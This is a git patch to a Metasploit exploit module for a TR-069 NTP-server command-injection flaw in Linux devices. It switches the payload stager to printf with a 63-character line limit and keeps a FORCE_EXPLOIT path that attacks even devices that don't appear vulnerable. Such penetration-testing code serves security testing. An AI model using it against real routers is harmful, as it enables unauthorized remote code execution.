From 657d52951b1c12cd4eaf056ea2470f078c23d76d Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 30 Nov 2016 07:51:36 -0600
Subject: [PATCH] Linemax 63, switch to printf

---
 .../exploits/linux/http/tr069_ntpserver_cmdinject.rb  | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
index bf7ec0b94d..ebd335f4a2 100644
--- a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
+++ b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
@@ -116,15 +116,22 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Safe
   end
 
+  def inject_staged_data
+    execute_cmdstager(
+      flavor: :printf,
+      linemax: 63
+    )
+  end
+
   def exploit
     print_status("#{peer} - Checking...")
 
     if check == Exploit::CheckCode::Appears
       print_status("#{peer} - Appears vulnerable")
-      execute_cmdstager({:flavor => :echo})
+      inject_staged_data
     elsif datastore['FORCE_EXPLOIT']
       print_status("#{peer} - Doesn't appear vulnerable, but trying anyway.")
-      execute_cmdstager({:flavor => :echo})
+      inject_staged_data
     else
       fail_with(Failure::Unknown, "#{peer} - Failed to access the device")
     end